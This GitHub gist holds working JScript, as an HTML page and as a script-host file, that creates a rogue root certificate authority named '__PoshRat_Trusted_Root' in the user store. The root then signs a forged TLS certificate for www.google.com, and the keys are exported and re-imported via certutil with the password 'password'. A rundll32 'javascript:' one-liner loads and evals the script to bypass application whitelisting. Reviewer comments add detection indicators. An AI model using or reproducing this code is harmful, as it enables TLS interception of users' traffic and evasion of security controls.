@johnjohnsp1
Created December 30, 2015 19:04
Creates and Installs a Certificate in User Store - Windows -Work In Progress
<html>
<head>
<script>
/*
 * InvokeCreateCertificate(certSubject, isCA)
 *
 * Builds an X.509 certificate through the Windows X509Enrollment COM API and
 * installs it for the current user.
 *
 *   certSubject - common name; the subject becomes "CN=" + certSubject.
 *   isCA        - truthy: add a CA basic-constraints extension, install the
 *                 certificate signed with its own key (no SignerCertificate is
 *                 set), then export it to a PFX and re-import it with certutil.
 *                 falsy: sign the certificate with the certificate that
 *                 certutil reports for the hard-coded issuer name.
 *
 * Returns nothing. Everything is a side effect: a new key pair, writes to the
 * user's certificate store, certutil child processes and (CA branch) a PFX on
 * disk.
 *
 * Review notes:
 *  - The issuer name is hard-coded to "__PoshRat_Trusted_Root" in both branches.
 *  - Artifacts this function leaves for detection: a current-user certificate
 *    with CN=__PoshRat_Trusted_Root, certutil started by a script host with
 *    -store / -exportPFX / -importpfx, and C:\Windows\Tasks\cert.pfx.
 *  - User context is used throughout (MachineContext = 0, request context 1),
 *    so presumably no elevation is required - confirm on the target build.
 */
function InvokeCreateCertificate(certSubject, isCA)
{
var CAsubject = certSubject;
// Subject name. Encode flag 0 is XCN_CERT_NAME_STR_NONE (default string parsing).
var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
dn.Encode( "CN=" + CAsubject, 0);
// Issuer name is fixed, whatever certSubject is.
var issuer = "__PoshRat_Trusted_Root";
var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
issuerdn.Encode("CN=" + issuer, 0);
var key = new ActiveXObject("X509Enrollment.CX509PrivateKey");
key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider";
// X509KeySpec: 2 = XCN_AT_SIGNATURE (used for the CA key), 1 = XCN_AT_KEYEXCHANGE (leaf key).
if(isCA)
{
key.KeySpec = 2 ;
}
else
{
key.KeySpec = 1;
}
// NOTE(review): 1024-bit RSA is below the 2048-bit minimum that current guidance expects.
key.Length = 1024;
// 0 = key lives in the current user's key store, not the machine store.
key.MachineContext = 0;
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379412(v=vs.85).aspx
// NOTE(review): 11 is a bitmask; read against X509PrivateKeyExportFlags it looks like
// export (1) + plaintext export (2) + plaintext archiving (8) - confirm against the link above.
// Either way the private key is created exportable, which the PFX export below relies on.
key.ExportPolicy = 11;
key.Create() ;
// Enhanced Key Usage: 1.3.6.1.5.5.7.3.1 is id-kp-serverAuth (TLS server authentication).
// It is added to the certificate in both branches, including the CA one.
var serverauthoid = new ActiveXObject("X509Enrollment.CObjectId");
serverauthoid.InitializeFromValue("1.3.6.1.5.5.7.3.1");
var ekuoids = new ActiveXObject("X509Enrollment.CObjectIds.1");
ekuoids.Add(serverauthoid);
var ekuext = new ActiveXObject("X509Enrollment.CX509ExtensionEnhancedKeyUsage");
ekuext.InitializeEncode(ekuoids);
var cert = new ActiveXObject("X509Enrollment.CX509CertificateRequestCertificate");
// First argument 1 = ContextUser; empty template name.
cert.InitializeFromPrivateKey(1, key, "");
cert.Subject = dn;
cert.Issuer = issuerdn;
// Fixed validity window, hard-coded as date strings.
cert.NotBefore = "12/31/2014";
cert.NotAfter = "12/31/2025";
// Signature hash: SHA256, looked up in the hash-algorithm OID group (first argument 1).
var hashAlgorithmObject = new ActiveXObject("X509Enrollment.CObjectId");
hashAlgorithmObject.InitializeFromAlgorithmName(1,0,0,"SHA256");
cert.HashAlgorithm = hashAlgorithmObject;
cert.X509Extensions.Add(ekuext)
if (isCA)
{
// Basic constraints: CA = true, path length constraint 1.
var basicConst = new ActiveXObject("X509Enrollment.CX509ExtensionBasicConstraints");
basicConst.InitializeEncode("true", 1);
cert.X509Extensions.Add(basicConst);
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
// CreateRequest(0): 0 = base64 with header encoding.
var certdata = enrollment.CreateRequest(0);
// InstallResponse restriction 2 = AllowUntrustedCertificate: the response is
// installed even though it does not chain to an already trusted root.
enrollment.InstallResponse(2, certdata, 0, "");
var oShell = new ActiveXObject("WScript.Shell");
// Dump the matching certificate from the user's MY store and read its serial
// from the third output line. This assumes a fixed "label: value" layout;
// different certutil output (other locale, no match) makes the split throw.
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
// NOTE(review): the certificate and its private key are written to disk as a PFX
// protected only by the hard-coded password "password"; nothing in this function
// deletes C:\Windows\Tasks\cert.pfx afterwards.
var oExec = oShell.Exec('certutil -exportPFX -p password -user My '+ serial +' C:\\Windows\\Tasks\\cert.pfx');
// Exec does not wait for the child process. This loop is a busy-wait that stops
// after 1e7 iterations or 5 seconds, whichever comes first, so it is not a
// guaranteed 5-second delay and it never checks that the export finished.
var start = new Date().getTime();
for (var i = 0; i < 1e7; i++) {
if ((new Date().getTime() - start) > 5000){
break;
}
}
// Re-import the PFX for the current user; -f forces overwrite.
// NOTE(review): presumably this is what places the self-signed root where it is
// trusted - the store certutil chooses is not visible from this code.
var oExec = oShell.Exec('certutil -f -p password -user -importpfx C:\\Windows\\Tasks\\cert.pfx');
}
else
{
var oShell = new ActiveXObject("WScript.Shell");
// Same lookup and positional parsing as the CA branch: find the root by name
// in the user's MY store and take the serial from the third output line.
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var signerCertificate = new ActiveXObject("X509Enrollment.CSignerCertificate");
// Arguments: user context (0), no verification of the signer (0), hex string
// encoding (4), then the value parsed above identifying the signing certificate.
signerCertificate.Initialize(0,0,4, serial)
cert.SignerCertificate = signerCertificate
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
// 2 = AllowUntrustedCertificate, as in the CA branch.
enrollment.InstallResponse(2, certdata, 0, "");
}
}
// Order matters: the first call creates the CA certificate named
// "__PoshRat_Trusted_Root"; the second call looks that certificate up by name
// to sign a server-authentication leaf for a public hostname.
// NOTE(review): a locally issued certificate for a public hostname, chained to a
// root created on the same machine, is what TLS interception needs - treat either
// certificate in a user store as an indicator worth investigating.
InvokeCreateCertificate("__PoshRat_Trusted_Root", true);
InvokeCreateCertificate("www.google.com", false);
</script>
</head>
<body>
Hello We just Added A Cert. Thanks!
</body>
</html>
//rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();fso=new%20ActiveXObject("Scripting.FileSystemObject");f=fso.OpenTextFile("c:\\Bypass\\jsenroll.js",1);eval(f.ReadAll());
//certutil -f -p password -user -importpfx cert.pfx
/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause
*/
/*
 * InvokeCreateCertificate(certSubject, isCA)
 *
 * Script-host variant of the certificate builder: creates an X.509 certificate
 * through the Windows X509Enrollment COM API and installs it for the current
 * user.
 *
 *   certSubject - common name; the subject becomes "CN=" + certSubject.
 *   isCA        - truthy: add a CA basic-constraints extension, install the
 *                 certificate signed with its own key (no SignerCertificate is
 *                 set), then export and re-import it as a PFX with certutil.
 *                 falsy: sign with the certificate certutil reports for the
 *                 hard-coded issuer name.
 *
 * Returns nothing; all effects are side effects (key creation, store writes,
 * certutil child processes, a cert.pfx in the working directory).
 *
 * Review notes:
 *  - Artifacts for detection: a current-user certificate with
 *    CN=__PoshRat_Trusted_Root, certutil started by a script host with
 *    -store / -exportPFX / -importpfx, and a cert.pfx file in whatever the
 *    current directory is.
 *  - User context is used throughout (MachineContext = 0, request context 1),
 *    so presumably no elevation is required - confirm on the target build.
 */
function InvokeCreateCertificate(certSubject, isCA)
{
var CAsubject = certSubject;
// Subject name. Encode flag 0 is XCN_CERT_NAME_STR_NONE (default string parsing).
var dn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
dn.Encode( "CN=" + CAsubject, 0);
// Issuer name is fixed, whatever certSubject is.
var issuer = "__PoshRat_Trusted_Root";
var issuerdn = new ActiveXObject("X509Enrollment.CX500DistinguishedName");
issuerdn.Encode("CN=" + issuer, 0);
var key = new ActiveXObject("X509Enrollment.CX509PrivateKey");
key.ProviderName = "Microsoft Enhanced RSA and AES Cryptographic Provider";
// X509KeySpec: 2 = XCN_AT_SIGNATURE (used for the CA key), 1 = XCN_AT_KEYEXCHANGE (leaf key).
if(isCA)
{
key.KeySpec = 2 ;
}
else
{
key.KeySpec = 1;
}
// NOTE(review): 1024-bit RSA is below the 2048-bit minimum that current guidance expects.
key.Length = 1024;
// 0 = key lives in the current user's key store, not the machine store.
key.MachineContext = 0;
//https://msdn.microsoft.com/en-us/library/windows/desktop/aa379412(v=vs.85).aspx
// NOTE(review): 11 is a bitmask; read against X509PrivateKeyExportFlags it looks like
// export (1) + plaintext export (2) + plaintext archiving (8) - confirm against the link above.
// Either way the private key is created exportable, which the PFX export below relies on.
key.ExportPolicy = 11;
key.Create() ;
// Enhanced Key Usage: 1.3.6.1.5.5.7.3.1 is id-kp-serverAuth (TLS server authentication).
// It is added to the certificate in both branches, including the CA one.
var serverauthoid = new ActiveXObject("X509Enrollment.CObjectId");
serverauthoid.InitializeFromValue("1.3.6.1.5.5.7.3.1");
var ekuoids = new ActiveXObject("X509Enrollment.CObjectIds.1");
ekuoids.Add(serverauthoid);
var ekuext = new ActiveXObject("X509Enrollment.CX509ExtensionEnhancedKeyUsage");
ekuext.InitializeEncode(ekuoids);
var cert = new ActiveXObject("X509Enrollment.CX509CertificateRequestCertificate");
// First argument 1 = ContextUser; empty template name.
cert.InitializeFromPrivateKey(1, key, "");
cert.Subject = dn;
cert.Issuer = issuerdn;
// Fixed validity window, hard-coded as date strings.
cert.NotBefore = "12/31/2014";
cert.NotAfter = "12/31/2025";
// Signature hash: SHA256, looked up in the hash-algorithm OID group (first argument 1).
var hashAlgorithmObject = new ActiveXObject("X509Enrollment.CObjectId");
hashAlgorithmObject.InitializeFromAlgorithmName(1,0,0,"SHA256");
cert.HashAlgorithm = hashAlgorithmObject;
cert.X509Extensions.Add(ekuext)
if (isCA)
{
// Basic constraints: CA = true, path length constraint 1.
var basicConst = new ActiveXObject("X509Enrollment.CX509ExtensionBasicConstraints");
basicConst.InitializeEncode("true", 1);
cert.X509Extensions.Add(basicConst);
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
// CreateRequest(0): 0 = base64 with header encoding.
var certdata = enrollment.CreateRequest(0);
// InstallResponse restriction 2 = AllowUntrustedCertificate: the response is
// installed even though it does not chain to an already trusted root.
enrollment.InstallResponse(2, certdata, 0, "");
var oShell = new ActiveXObject("WScript.Shell");
// Dump the matching certificate from the user's MY store and read its serial
// from the third output line. This assumes a fixed "label: value" layout;
// different certutil output (other locale, no match) makes the split throw.
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
// NOTE(review): the certificate and its private key are written to a PFX in the
// current directory, protected only by the hard-coded password "password";
// nothing in this function deletes the file afterwards.
var oExec = oShell.Exec('certutil -exportPFX -p "password" -user My '+ serial +' cert.pfx');
// Exec does not wait for the child process and there is no delay here, so this
// import is not ordered after the export above.
// NOTE(review): presumably the import is what places the self-signed root where
// it is trusted - the store certutil chooses is not visible from this code.
var oExec = oShell.Exec('certutil -f -p password -user -importpfx cert.pfx');
}
else
{
var oShell = new ActiveXObject("WScript.Shell");
// Same lookup and positional parsing as the CA branch: find the root by name
// in the user's MY store and take the serial from the third output line.
var oExec = oShell.Exec('certutil -store -user MY __PoshRat_Trusted_Root');
var strOut = oExec.StdOut.ReadAll();
var lines = strOut.split("\r\n");
var serial = lines[2].split(":")[1].split(" ")[1]
var signerCertificate = new ActiveXObject("X509Enrollment.CSignerCertificate");
// Arguments: user context (0), no verification of the signer (0), hex string
// encoding (4), then the value parsed above identifying the signing certificate.
signerCertificate.Initialize(0,0,4, serial)
cert.SignerCertificate = signerCertificate
cert.Encode();
var enrollment = new ActiveXObject("X509Enrollment.CX509Enrollment");
enrollment.InitializeFromRequest(cert);
var certdata = enrollment.CreateRequest(0);
// 2 = AllowUntrustedCertificate, as in the CA branch.
enrollment.InstallResponse(2, certdata, 0, "");
}
}
// Order matters: the first call creates the CA certificate named
// "__PoshRat_Trusted_Root"; the second call looks that certificate up by name
// to sign a server-authentication leaf for a public hostname.
// NOTE(review): a locally issued certificate for a public hostname, chained to a
// root created on the same machine, is what TLS interception needs - treat either
// certificate in a user store as an indicator worth investigating.
InvokeCreateCertificate("__PoshRat_Trusted_Root", true);
InvokeCreateCertificate("www.google.com", false);